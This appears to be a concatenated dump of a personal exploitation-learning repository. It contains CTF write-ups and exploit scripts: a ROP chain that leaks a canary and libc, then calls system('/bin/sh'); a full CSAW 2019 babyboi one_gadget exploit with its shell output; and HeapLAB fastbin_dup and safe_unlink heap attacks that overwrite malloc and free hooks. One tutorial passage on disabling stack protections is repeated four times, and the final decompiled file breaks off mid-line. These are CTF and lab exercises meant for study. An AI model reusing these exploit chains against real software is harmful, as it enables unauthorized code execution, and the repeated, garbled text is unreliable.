= review() # Leak the canary, and parse it out 57 | 58 | # Start the rop chain to give us a libc infoleak 59 | leakLibc = "" 60 | leakLibc += "0"*0xa8 # Fill up space up to the canary 61 | leakLibc += p64(canary) # Overwrite the stack canary with itself 62 | leakLibc += "1"*0x8 # 8 more bytes until the return address 63 | leakLibc += popRdi # Pop got entry for puts in rdi register 64 | leakLibc += gotPuts # GOT address of puts 65 | leakLibc += pltPuts # PLT address of puts 66 | leakLibc += startMain # Loop back around to the start of main 67 | 68 | # Send the payload to leak libc 69 | feed(leakLibc) 70 | 71 | # Return to execute our code 72 | leave() 73 | 74 | # Scan in and parse out the infoleak 75 | 76 | print target.recvuntil("[*]BYE ~ TIME TO MINE MIENRALS...\x0a") 77 | 78 | putsLeak = target.recvline().replace("\x0a", "") 79 | 80 | putsLibc = u64(putsLeak + "\x00"*(8-len(putsLeak))) 81 | 82 | # Calculate the needed addresses 83 | 84 | libcBase = putsLibc - offsetPuts 85 | systemLibc = libcBase + offsetSystem 86 | binshLibc = libcBase + offsetBinsh 87 | 88 | print "libc base: " + hex(libcBase) 89 | 90 | # Form the payload to return to system 91 | 92 | payload = "" 93 | payload += "0"*0xa8 94 | payload += p64(canary) 95 | payload += "1"*0x8 96 | payload += popRdi # Pop "/bin/sh" into the rdi register, where it expects it's argument (single char pointer) 97 | payload += p64(binshLibc) # Address to '/bin/sh' 98 | payload += p64(systemLibc) # Libc address of system 99 | 100 | # Send the final payload 101 | feed(payload) 102 | 103 | target.sendline("3") 104 | 105 | #feed(payload) 106 | 107 | # Return to execute our code, return to system and get a shell 108 | #leave() 109 | 110 | target.interactive() 111 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/DINAMIC-BOF/08-bof_dynamic/csaw19_babyboi/readme.md: -------------------------------------------------------------------------------- 1 | # Csaw 2019 Babyboi 2 | 3 | Let's take a look at the binary, libc file, and source code. For this challenge we do get a copy of it: 4 | 5 | ``` 6 | $ file baby_boi 7 | baby_boi: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1ff55dce2efc89340b86a666bba5e7ff2b37f62, not stripped 8 | $ pwn checksec baby_boi 9 | [*] '/Hackery/pod/modules/8-bof_dynamic/csaw19_babyboi/baby_boi' 10 | Arch: amd64-64-little 11 | RELRO: Partial RELRO 12 | Stack: No canary found 13 | NX: NX enabled 14 | PIE: No PIE (0x400000) 15 | $ ./libc-2.27.so 16 | GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27. 17 | Copyright (C) 2018 Free Software Foundation, Inc. 18 | This is free software; see the source for copying conditions. 19 | There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A 20 | PARTICULAR PURPOSE. 21 | Compiled by GNU CC version 7.3.0. 22 | libc ABIs: UNIQUE IFUNC 23 | For bug reporting instructions, please see: 24 | . 25 | $ ./baby_boi 26 | Hello! 27 | Here I am: 0x7f995049c830 28 | 15935728 29 | $ cat baby_boi.c 30 | #include 31 | #include 32 | 33 | int main(int argc, char **argv[]) { 34 | setvbuf(stdout, NULL, _IONBF, 0); 35 | setvbuf(stdin, NULL, _IONBF, 0); 36 | setvbuf(stderr, NULL, _IONBF, 0); 37 | 38 | char buf[32]; 39 | printf("Hello!\n"); 40 | printf("Here I am: %p\n", printf); 41 | gets(buf); 42 | } 43 | ``` 44 | 45 | So we can see that the binary just prompts us for text. Looking at the source code, we see that it prints the libc address for `printf`. After that it calls `gets` on a fixed sized buffer, which gives us a buffer overflow. We can see that the `libc` version is `libc-2.27.so `. Also the only binary protection we see is NX. 46 | 47 | ## Exploitation 48 | 49 | So to exploit this, we will use the buffer overflow. We will call a oneshot gadget, which is a single ROP gadget in the libc that will call `execve("/bin/sh")` given the right conditions. We can find this using the `one_gadget` utility (https://github.com/david942j/one_gadget): 50 | 51 | ``` 52 | $ one_gadget libc-2.27.so 53 | 0x4f2c5 execve("/bin/sh", rsp+0x40, environ) 54 | constraints: 55 | rcx == NULL 56 | 57 | 0x4f322 execve("/bin/sh", rsp+0x40, environ) 58 | constraints: 59 | [rsp+0x40] == NULL 60 | 61 | 0x10a38c execve("/bin/sh", rsp+0x70, environ) 62 | constraints: 63 | [rsp+0x70] == NULL 64 | ``` 65 | 66 | So leveraging the libc infoleak with the `printf` statement to the libc `printf` (and that we know which libc version it is), we know the address space of the libc. For which onegadget to pick, I typically just do trial and error to see what conditions will work. You can actually check when it is called to see what conditions will be met however. 67 | 68 | ## Exploit 69 | 70 | Putting it all together, we have the following exploit. This was ran on `Ubuntu 18.04`: 71 | ``` 72 | from pwn import * 73 | 74 | # Establish the target 75 | target = process('./baby_boi', env={"LD_PRELOAD":"./libc-2.27.so"}) 76 | libc = ELF('libc-2.27.so') 77 | #gdb.attach(target) 78 | 79 | print target.recvuntil("ere I am: ") 80 | 81 | # Scan in the infoleak 82 | leak = target.recvline() 83 | leak = leak.strip("\n") 84 | 85 | base = int(leak, 16) - libc.symbols['printf'] 86 | 87 | print "wooo:" + hex(base) 88 | 89 | # Calculate oneshot gadget 90 | oneshot = base + 0x4f322 91 | 92 | payload = "" 93 | payload += "0"*0x28 # Offset to oneshot gadget 94 | payload += p64(oneshot) # Oneshot gadget 95 | 96 | # Send the payload 97 | target.sendline(payload) 98 | 99 | target.interactive() 100 | ``` 101 | 102 | When we run the exploit: 103 | ``` 104 | $ python exploit.py 105 | [+] Starting local process './baby_boi': pid 12693 106 | [*] '/home/guyinatuxedo/Desktop/babyboi/libc-2.27.so' 107 | Arch: amd64-64-little 108 | RELRO: Partial RELRO 109 | Stack: Canary found 110 | NX: NX enabled 111 | PIE: PIE enabled 112 | Hello! 113 | Here I am: 114 | wooo:0x7fe0eb22e000 115 | [*] Switching to interactive mode 116 | $ w 117 | 21:29:32 up 57 min, 1 user, load average: 0.17, 0.26, 0.15 118 | USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 119 | guyinatu :0 :0 16Sep19 ?xdm? 47.39s 0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu 120 | $ ls 121 | baby_boi baby_boi.c exploit.py libc-2.27.so readme.md 122 | ``` 123 | -------------------------------------------------------------------------------- /ROP/64LinuxROP/text: -------------------------------------------------------------------------------- 1 | The Three Trials of Code Injection 2 | 3 | Alas, stack smashing is much harder these days. On my stock Ubuntu 12.04 install, there are 3 countermeasures: 4 | 5 | GCC Stack-Smashing Protector (SSP), aka ProPolice: the compiler rearranges the stack layout to make buffer overflows less dangerous and inserts runtime stack integrity checks. 6 | 7 | Executable space protection (NX): attempting to execute code in the stack causes a segmentation fault. This feature goes by many names, e.g. Data Execution Prevention (DEP) on Windows, or Write XOR Execute (W^X) on BSD. We call it NX here, because 64-bit Linux implements this feature with the CPU’s NX bit ("Never eXecute"). 8 | 9 | Address Space Layout Randomization (ASLR): the location of the stack is randomized every run, so even if we can overwrite the return address, we have no idea what to put there. 10 | 11 | We’ll cheat to get around them. Firstly, we disable the SSP: 12 | 13 | $ gcc -fno-stack-protector -o victim victim.c 14 | 15 | Next, we disable executable space protection: 16 | 17 | $ execstack -s victim 18 | 19 | Lastly, we disable ASLR when running the binary: 20 | 21 | $ setarch `arch` -R ./victim 22 | 23 | One more cheat. We’ll simply print the buffer location: 24 | 25 | printf("%p\n", name); // Print address of buffer.The Three Trials of Code Injection 26 | 27 | Alas, stack smashing is much harder these days. On my stock Ubuntu 12.04 install, there are 3 countermeasures: 28 | 29 | GCC Stack-Smashing Protector (SSP), aka ProPolice: the compiler rearranges the stack layout to make buffer overflows less dangerous and inserts runtime stack integrity checks. 30 | 31 | Executable space protection (NX): attempting to execute code in the stack causes a segmentation fault. This feature goes by many names, e.g. Data Execution Prevention (DEP) on Windows, or Write XOR Execute (W^X) on BSD. We call it NX here, because 64-bit Linux implements this feature with the CPU’s NX bit ("Never eXecute"). 32 | 33 | Address Space Layout Randomization (ASLR): the location of the stack is randomized every run, so even if we can overwrite the return address, we have no idea what to put there. 34 | 35 | We’ll cheat to get around them. Firstly, we disable the SSP: 36 | 37 | $ gcc -fno-stack-protector -o victim victim.c 38 | 39 | Next, we disable executable space protection: 40 | 41 | $ execstack -s victim 42 | 43 | Lastly, we disable ASLR when running the binary: 44 | 45 | $ setarch `arch` -R ./victim 46 | 47 | 48 | The Three Trials of Code Injection 49 | 50 | Alas, stack smashing is much harder these days. On my stock Ubuntu 12.04 install, there are 3 countermeasures: 51 | 52 | GCC Stack-Smashing Protector (SSP), aka ProPolice: the compiler rearranges the stack layout to make buffer overflows less dangerous and inserts runtime stack integrity checks. 53 | 54 | Executable space protection (NX): attempting to execute code in the stack causes a segmentation fault. This feature goes by many names, e.g. Data Execution Prevention (DEP) on Windows, or Write XOR Execute (W^X) on BSD. We call it NX here, because 64-bit Linux implements this feature with the CPU’s NX bit ("Never eXecute"). 55 | 56 | Address Space Layout Randomization (ASLR): the location of the stack is randomized every run, so even if we can overwrite the return address, we have no idea what to put there. 57 | 58 | We’ll cheat to get around them. Firstly, we disable the SSP: 59 | 60 | $ gcc -fno-stack-protector -o victim victim.c 61 | 62 | Next, we disable executable space protection: 63 | 64 | $ execstack -s victim 65 | 66 | Lastly, we disable ASLR when running the binary: 67 | 68 | $ setarch `arch` -R ./victim 69 | 70 | 71 | The Three Trials of Code Injection 72 | 73 | Alas, stack smashing is much harder these days. On my stock Ubuntu 12.04 install, there are 3 countermeasures: 74 | 75 | GCC Stack-Smashing Protector (SSP), aka ProPolice: the compiler rearranges the stack layout to make buffer overflows less dangerous and inserts runtime stack integrity checks. 76 | 77 | Executable space protection (NX): attempting to execute code in the stack causes a segmentation fault. This feature goes by many names, e.g. Data Execution Prevention (DEP) on Windows, or Write XOR Execute (W^X) on BSD. We call it NX here, because 64-bit Linux implements this feature with the CPU’s NX bit ("Never eXecute"). 78 | 79 | Address Space Layout Randomization (ASLR): the location of the stack is randomized every run, so even if we can overwrite the return address, we have no idea what to put there. 80 | 81 | We’ll cheat to get around them. Firstly, we disable the SSP: 82 | 83 | $ gcc -fno-stack-protector -o victim victim.c 84 | 85 | Next, we disable executable space protection: 86 | 87 | $ execstack -s victim 88 | 89 | Lastly, we disable ASLR when running the binary: 90 | 91 | $ setarch `arch` -R ./victim 92 | 93 | printf("%p\n", name); // Print address of buffer. 94 | 95 | 96 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-fastbin_dup/README.md: -------------------------------------------------------------------------------- 1 | ## Attacking fastbin and avoid 0x70 protection 2 | ***************************************** 3 | ### First Fastbin 4 | 5 | 1.- Write fake size 6 | ``` 7 | malloc(24,p64(0x61)) 8 | ``` 9 | ![imagen1.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen1.png) 10 | 11 | 2.- Write fake size in main arena 12 | ``` 13 | malloc(24,'C'*48) 14 | malloc(24,'D'*48) 15 | ``` 16 | ![imagen2.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen2.png) 17 | 18 | ### Second Fastbin for link fake chunk in fastbins list 19 | 20 | 3.-Fastbin 21 | ``` 22 | chunk_J=malloc(0X58,'C'*48) 23 | chunk_K=malloc(0x58,'D'*48) 24 | free(chunk_J) 25 | free(chunk_K) 26 | free(chunk_J) 27 | ``` 28 | ![imagen3.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen3.png) 29 | 30 | 4.- So now we can write what we want to link 31 | ``` 32 | malloc(0x58, p64( libc.sym.main_arena + 0x20 )) 33 | ``` 34 | 35 | ![imagen4.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen4.png) 36 | 37 | 5.- Move fake chunk to the fastbins and put it on the head of 0x60 fastbins 38 | ``` 39 | malloc(0x58,b'L'*8) 40 | malloc(0x58,b'M'*8) 41 | ``` 42 | ![imagen5.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen5.png) 43 | 44 | 6.- Write in main arena... 45 | 46 | To write 0x61 in the main arena and match with 0x60 fastbin we allocate 0x48 bytes instead of 0x24 and we'll have the target in 0x60 fastbins and in main arena we will see the fake chunk crafted with size field and foreword pointer. 47 | 48 | ![imagen6.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen6.png) 49 | 50 | Requests a chunk of 0x60 size to write in the main arena but before libc will check that the size field of fake chunk is in the range allowed for 0x60 fastbins, thats why we write the 0x61, if we request other 0x60 chunk will give us our fake chunk and we can write in main_arena. 51 | 52 | ``` 53 | malloc(0x58,b'N'*8) 54 | ``` 55 | 56 | 57 | ![imagen7.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen7.png) 58 | 59 | 60 | 7.- Overwrite top chunk pointer with malloc_hook 61 | 62 | The offset of top chunk is 48 bytes... 63 | 64 | ![imagen9.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen9.png) 65 | 66 | ``` 67 | malloc(0x58,b'Y'*48+p64(libc.sym.__malloc_hook -16)) 68 | ``` 69 | 70 | ![imagen10.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen10.png) 71 | 72 | Okey, so if we request a chunk that is not in fastbins malloc will return us a chunk from top chunk. 73 | 74 | ![imagen11.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen11.png) 75 | 76 | 8.- Bypass top chunk mitigation 77 | 78 | We are using glibc 2.30 for this challange and size version 2.29 top chunk mitigation was added 79 | 80 | ``` 81 | pwndbg> backtrace 82 | pwndbg> f 4 83 | pwndbg> context code 84 | ``` 85 | 86 | ![imagen12.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen12.png) 87 | 88 | ``` 89 | pwndbg>p/x av->system_mem 90 | $1 = 0x21000 91 | ``` 92 | 93 | We can go a little further back and take advantage of the alignment that is not checked... 94 | 95 | ![imagen13.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen13.png) 96 | 97 | Great, this size is a size allowed, if request a chunk ... 98 | 99 | ``` 100 | malloc(0x28,b'Y'*19+p64(0xdeadbeef)) 101 | malloc(0x28,b'') 102 | ``` 103 | 104 | ![imagen14.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen14.png) 105 | 106 | 9.- One gadget 107 | 108 | ``` 109 | malloc(0x28,b'Y'*19+p64(libc.address + 0xe1fa1)) 110 | malloc(0x28,b'') 111 | ``` 112 | 113 | ![imagen15.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen15.png) 114 | 115 | Is taking 'LLLLLLLLDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD' as parameter and the execution fails, but it is something we control, maybe if we pass other argument 116 | 117 | ![imagen16.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen16.png) 118 | 119 | Let's change the line: 'malloc(0x58,b'L'*8)' to 'malloc(0x58,b'-s\0')' 120 | 121 | ![imagen17.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/challenge-fastbin_dup/assets/Imagen17.png) 122 | 123 | and shell! 124 | 125 | ## References 126 | 127 | Max Kamper, Linux Heap Exploitation - Part 1, Udemy 4(12) -------------------------------------------------------------------------------- /HEAP/syscallMalloc/mmapMUMAP: -------------------------------------------------------------------------------- 1 | Start Addr End Addr Size Offset objfile 2 | 0x8048000 0x8049000 0x1000 0x0 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 3 | 0x8049000 0x804a000 0x1000 0x1000 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 4 | 0x804a000 0x804b000 0x1000 0x2000 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 5 | 0x804b000 0x804c000 0x1000 0x2000 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 6 | 0x804c000 0x804d000 0x1000 0x3000 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 7 | 0x804d000 0x806f000 0x22000 0x0 [heap] 8 | 0xf7dd3000 0xf7df0000 0x1d000 0x0 /usr/lib/i386-linux-gnu/libc-2.29.so 9 | 0xf7df0000 0xf7f40000 0x150000 0x1d000 /usr/lib/i386-linux-gnu/libc-2.29.so 10 | 0xf7f40000 0xf7fac000 0x6c000 0x16d000 /usr/lib/i386-linux-gnu/libc-2.29.so 11 | 0xf7fac000 0xf7fad000 0x1000 0x1d9000 /usr/lib/i386-linux-gnu/libc-2.29.so 12 | 0xf7fad000 0xf7faf000 0x2000 0x1d9000 /usr/lib/i386-linux-gnu/libc-2.29.so 13 | 0xf7faf000 0xf7fb1000 0x2000 0x1db000 /usr/lib/i386-linux-gnu/libc-2.29.so 14 | 0xf7fb1000 0xf7fb3000 0x2000 0x0 15 | 0xf7fce000 0xf7fd0000 0x2000 0x0 16 | 0xf7fd0000 0xf7fd3000 0x3000 0x0 [vvar] 17 | 0xf7fd3000 0xf7fd4000 0x1000 0x0 [vdso] 18 | 0xf7fd4000 0xf7fd5000 0x1000 0x0 /usr/lib/i386-linux-gnu/ld-2.29.so 19 | 0xf7fd5000 0xf7ff1000 0x1c000 0x1000 /usr/lib/i386-linux-gnu/ld-2.29.so 20 | 0xf7ff1000 0xf7ffb000 0xa000 0x1d000 /usr/lib/i386-linux-gnu/ld-2.29.so 21 | 0xf7ffc000 0xf7ffd000 0x1000 0x27000 /usr/lib/i386-linux-gnu/ld-2.29.so 22 | 0xf7ffd000 0xf7ffe000 0x1000 0x28000 /usr/lib/i386-linux-gnu/ld-2.29.so 23 | 0xfffdd000 0xffffe000 0x21000 0x0 [stack] 24 | gef➤ c 25 | 26 | 27 | Start Addr End Addr Size Offset objfile 28 | 0x8048000 0x8049000 0x1000 0x0 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 29 | 0x8049000 0x804a000 0x1000 0x1000 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 30 | 0x804a000 0x804b000 0x1000 0x2000 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 31 | 0x804b000 0x804c000 0x1000 0x2000 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 32 | 0x804c000 0x804d000 0x1000 0x3000 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 33 | 0x804d000 0x806f000 0x22000 0x0 [heap] 34 | 0xf7db2000 0xf7dd3000 0x21000 0x0 35 | 0xf7dd3000 0xf7df0000 0x1d000 0x0 /usr/lib/i386-linux-gnu/libc-2.29.so 36 | 0xf7df0000 0xf7f40000 0x150000 0x1d000 /usr/lib/i386-linux-gnu/libc-2.29.so 37 | 0xf7f40000 0xf7fac000 0x6c000 0x16d000 /usr/lib/i386-linux-gnu/libc-2.29.so 38 | 0xf7fac000 0xf7fad000 0x1000 0x1d9000 /usr/lib/i386-linux-gnu/libc-2.29.so 39 | 0xf7fad000 0xf7faf000 0x2000 0x1d9000 /usr/lib/i386-linux-gnu/libc-2.29.so 40 | 0xf7faf000 0xf7fb1000 0x2000 0x1db000 /usr/lib/i386-linux-gnu/libc-2.29.so 41 | 0xf7fb1000 0xf7fb3000 0x2000 0x0 42 | 0xf7fce000 0xf7fd0000 0x2000 0x0 43 | 0xf7fd0000 0xf7fd3000 0x3000 0x0 [vvar] 44 | 0xf7fd3000 0xf7fd4000 0x1000 0x0 [vdso] 45 | 0xf7fd4000 0xf7fd5000 0x1000 0x0 /usr/lib/i386-linux-gnu/ld-2.29.so 46 | 0xf7fd5000 0xf7ff1000 0x1c000 0x1000 /usr/lib/i386-linux-gnu/ld-2.29.so 47 | 0xf7ff1000 0xf7ffb000 0xa000 0x1d000 /usr/lib/i386-linux-gnu/ld-2.29.so 48 | 0xf7ffc000 0xf7ffd000 0x1000 0x27000 /usr/lib/i386-linux-gnu/ld-2.29.so 49 | 0xf7ffd000 0xf7ffe000 0x1000 0x28000 /usr/lib/i386-linux-gnu/ld-2.29.so 50 | 0xfffdd000 0xffffe000 0x21000 0x0 [stack] 51 | 52 | 53 | Start Addr End Addr Size Offset objfile 54 | 0x8048000 0x8049000 0x1000 0x0 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 55 | 0x8049000 0x804a000 0x1000 0x1000 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 56 | 0x804a000 0x804b000 0x1000 0x2000 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 57 | 0x804b000 0x804c000 0x1000 0x2000 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 58 | 0x804c000 0x804d000 0x1000 0x3000 /home/ivansk8421/GIT/Pwning/HEAP/syscallMalloc/mmap32 59 | 0x804d000 0x806f000 0x22000 0x0 [heap] 60 | 0xf7db2000 0xf7dd3000 0x21000 0x0 61 | 0xf7dd3000 0xf7df0000 0x1d000 0x0 /usr/lib/i386-linux-gnu/libc-2.29.so 62 | 0xf7df0000 0xf7f40000 0x150000 0x1d000 /usr/lib/i386-linux-gnu/libc-2.29.so 63 | 0xf7f40000 0xf7fac000 0x6c000 0x16d000 /usr/lib/i386-linux-gnu/libc-2.29.so 64 | 0xf7fac000 0xf7fad000 0x1000 0x1d9000 /usr/lib/i386-linux-gnu/libc-2.29.so 65 | 0xf7fad000 0xf7faf000 0x2000 0x1d9000 /usr/lib/i386-linux-gnu/libc-2.29.so 66 | 0xf7faf000 0xf7fb1000 0x2000 0x1db000 /usr/lib/i386-linux-gnu/libc-2.29.so 67 | 0xf7fb1000 0xf7fb3000 0x2000 0x0 68 | 0xf7fce000 0xf7fd0000 0x2000 0x0 69 | 0xf7fd0000 0xf7fd3000 0x3000 0x0 [vvar] 70 | 0xf7fd3000 0xf7fd4000 0x1000 0x0 [vdso] 71 | 0xf7fd4000 0xf7fd5000 0x1000 0x0 /usr/lib/i386-linux-gnu/ld-2.29.so 72 | 0xf7fd5000 0xf7ff1000 0x1c000 0x1000 /usr/lib/i386-linux-gnu/ld-2.29.so 73 | 0xf7ff1000 0xf7ffb000 0xa000 0x1d000 /usr/lib/i386-linux-gnu/ld-2.29.so 74 | 0xf7ffc000 0xf7ffd000 0x1000 0x27000 /usr/lib/i386-linux-gnu/ld-2.29.so 75 | 0xf7ffd000 0xf7ffe000 0x1000 0x28000 /usr/lib/i386-linux-gnu/ld-2.29.so 76 | 0xfffdd000 0xffffe000 0x21000 0x0 [stack] 77 | 78 | 79 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/README.md: -------------------------------------------------------------------------------- 1 | # Safe Unlink 2 | 3 | ## Checksec 4 | 5 | ![checksec.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/safe_unlink/assets/checksec.png) 6 | 7 | ## Tips 8 | 1. Avoid use 'vis' command when corrupted the heap 9 | 10 | 2. Some commands 11 | ``` 12 | pwndbg> p *((struct malloc_chunk*)0x603010).fd 13 | pwndbg> dq mp_-sbrK_base 14 | pwndbg> p__free_hook 15 | pwndbg> ds m_array[0].user_data 16 | ``` 17 | 18 | ## Reflected write 19 | 20 | ### 1. Prepare chunks 21 | 22 | 23 | ![Image1.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/safe_unlink/assets/Image1.png) 24 | 25 | ### 2. Bypass protections 26 | 27 | #### corrupted size vs. prev_size 28 | 29 | ``` 30 | fd = 0xdeadbeef 31 | bk = 0xcafebabe 32 | prev_size = 0x90 33 | fake_size = 0x90 34 | edit(chunk_A, p64(fd) + p64(bk) + p8(0)*0x70 + p64(prev_size) + p64(fake_size)) 35 | ``` 36 | 37 | The prev_size field must correspond to the size field of the previous chunk. 38 | 39 | 40 | #### corrupted double-linked list 41 | 42 | 43 | ![Image2.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/safe_unlink/assets/Image2.png) 44 | 45 | 46 | The problem is shown in the code section, and we can see that libc detects our unlinking because the backward pointer of next chunk must point to the original previous chunk of this, and forward pointer of previous chunk also must point to the original next chunk of this. As the error shows, it says that the doubly linked list was corrupted. 47 | 48 | We could pass the safe unlinking check by simply setting both our forged fd and bk to the address of the chunk being unlinking. Malloc doesn't keep track of allocated chunks, it keeps pointers to its heaps' top chunk and free chunk in their respective arenas, but when a chunk is allocated to a thread, that thread is expected to keep a reference of the chunk, the program must strore pointers to every chubk it's been allocated somewhere, whether it keeps them on the stack, in data section or even on the heap itself. 49 | 50 | This binary keeps pointers in their data section in an array labeled m_array... 51 | 52 | ![Image3.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/safe_unlink/assets/Image3.png) 53 | 54 | 55 | ``` 56 | fd = elf.sym.m_array-24 57 | bk = elf.sym.m_array-16 58 | prev_size = 0x90 59 | fake_size = 0x90 60 | edit(chunk_A, p64(fd) + p64(bk) + p8(0)*0x70 + p64(prev_size) + p64(fake_size)) 61 | ``` 62 | 63 | ![Image4.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/safe_unlink/assets/Image4.png) 64 | 65 | But error persists, so maybe need to make that chunk needs to unlink from the start of user data's of chunk, we need to add some metadata since we are now forging an entire fake chunk inside it. 66 | 67 | Lastly, we need to decrease the amount of garbage out bk and prev size field to account for the new fields. 68 | 69 | ``` 70 | fd = elf.sym.m_array-24 71 | bk = elf.sym.m_array-16 72 | prev_size = 0x80 73 | fake_size = 0x90 74 | edit(chunk_A, p64(0)+p64(80)+ p64(fd) + p64(bk) + p8(0)*0x60 + p64(prev_size) + p64(fake_size)) 75 | free(chunk_B) 76 | ``` 77 | 78 | We had to create a new chunk because when it validates the size, the bytes we ask for having to add the 16 of the metadata and that is when it does not meet the prev size constraint. And we could not request the chunk of that size from the beginning, because I would not store them in the same list and they would not be contiguous. 79 | 80 | ![Image5.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/safe_unlink/assets/Image5.png) 81 | 82 | This is enough to pass the safe unlinking check ... 83 | 84 | ![Image6.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/safe_unlink/assets/Image6.png) 85 | 86 | We noticed that the area has also been overwritten 87 | 88 | ![Image7.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/safe_unlink/assets/Image7.png) 89 | 90 | And arbitrary writing has worked, now m_array points to our fake chunk, and can write on itself. 91 | 92 | ``` 93 | edit(0,p64(0)*3 +p64(elf.sym.target)) 94 | edit(0, 'Hello world') 95 | ``` 96 | 97 | ![Image8.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/safe_unlink/assets/Image8.png) 98 | 99 | ![reflected_write.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/safe_unlink/assets/reflected_write.jpeg) 100 | 101 | ## Get Shell 102 | 103 | ``` 104 | edit(0,p64(0)*3 +p64(libc.sym.__free_hook - 8 )) 105 | edit(0, b'/bin/sh\0'+ p64(libc.sym.system)) 106 | free(0) 107 | ``` 108 | 109 | ![shell.png](https://raw.githubusercontent.com/ivanmedina/Pwning/master/HEAP/HeapLAB/safe_unlink/assets/shell.png) 110 | 111 | ## Summary 112 | 113 | - Request two chunks A and B, and leveraged an overflow bug to clear prev_inuse flag on the allocated chunk B. 114 | - Prepare a fake chunk metadata in its previous chunk, chunk A, including a size field, forward pointer and backward pointer, and prev_size field. 115 | - When we freed chunk B, its clear prev_inuse flag indicated to malloc that the previous chunk was free, therefore a candidate for consolidation. 116 | - Malloc used our forged prev_size field to find the start of the previous chunk so it could unlink prior to consolidation. 117 | - FD and BK checked that the BK at the destination pointed back to our fake chunk, and perform the same check to BK. 118 | - Once our fake chunk passed the safe unlinking checks, malloc unlinked it. 119 | - It followed our FD and copied our BK over the BK at its destination. Then it followed our BK and copied our FD over the FD at its destination. 120 | 121 | 122 | ## References 123 | 124 | * Max Kamper, Linux Heap Exploitation - Part 1, Udemy 6(15) 125 | * https://github.com/ivanmedina/Pwning/tree/master/HEAP/HeapLAB/unsafe_unlink -------------------------------------------------------------------------------- /PWNable.tw/CALC/parse_expr.c: -------------------------------------------------------------------------------- 1 | undefined4 parse_expr(void *paramBF1024,int *param_2) //(buffer1024,&pool) 2 | { 3 | int iterator; 4 | char *mCpChr; 5 | int myChar; 6 | undefined4 returnedVar; 7 | size_t nBytes; 8 | int in_GS_OFFSET; 9 | void *buffer1024; 10 | int contador; 11 | int pointerArray; 12 | char arrayExpr [100]; 13 | int canary; 14 | 15 | canary = *(int *)(in_GS_OFFSET + 0x14); 16 | buffer1024 = paramBF1024; 17 | pointerArray = 0; 18 | bzero(arrayExpr,100); 19 | contador = 0; 20 | 21 | do { 22 | if (9 < (int)*(char *)((int)paramBF1024 + contador) - 0x30U) { // if ( (int(actualChar) - 48) > 9 ) check char is allowed 23 | 24 | nBytes = (int)paramBF1024 + (contador - (int)buffer1024); 